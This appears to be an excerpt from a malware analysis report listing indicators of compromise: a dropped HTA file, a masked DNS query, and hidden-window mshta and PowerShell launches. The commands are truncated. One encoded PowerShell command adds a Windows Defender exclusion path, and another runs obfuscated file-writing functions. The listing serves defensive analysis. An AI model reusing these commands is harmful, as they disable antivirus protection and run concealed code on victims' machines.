Technical Information
- %APPDATA%\test.hta
- DNS ASK fv##.app
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAG4AcABwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...' (with hidden window)
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\test.hta"' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function SuePMjHPO($IAJAH, $FVAmktbqO){[IO.File]::WriteAllBytes($IAJAH, $FVAmktbqO)};function VNPYyEohpUh($IAJAH){if($IAJAH.EndsWith((kxpMiBDwwYrxdiO @(61736,61790...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAG4AcABwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...
- '%WINDIR%\syswow64\mshta.exe' "%APPDATA%\test.hta"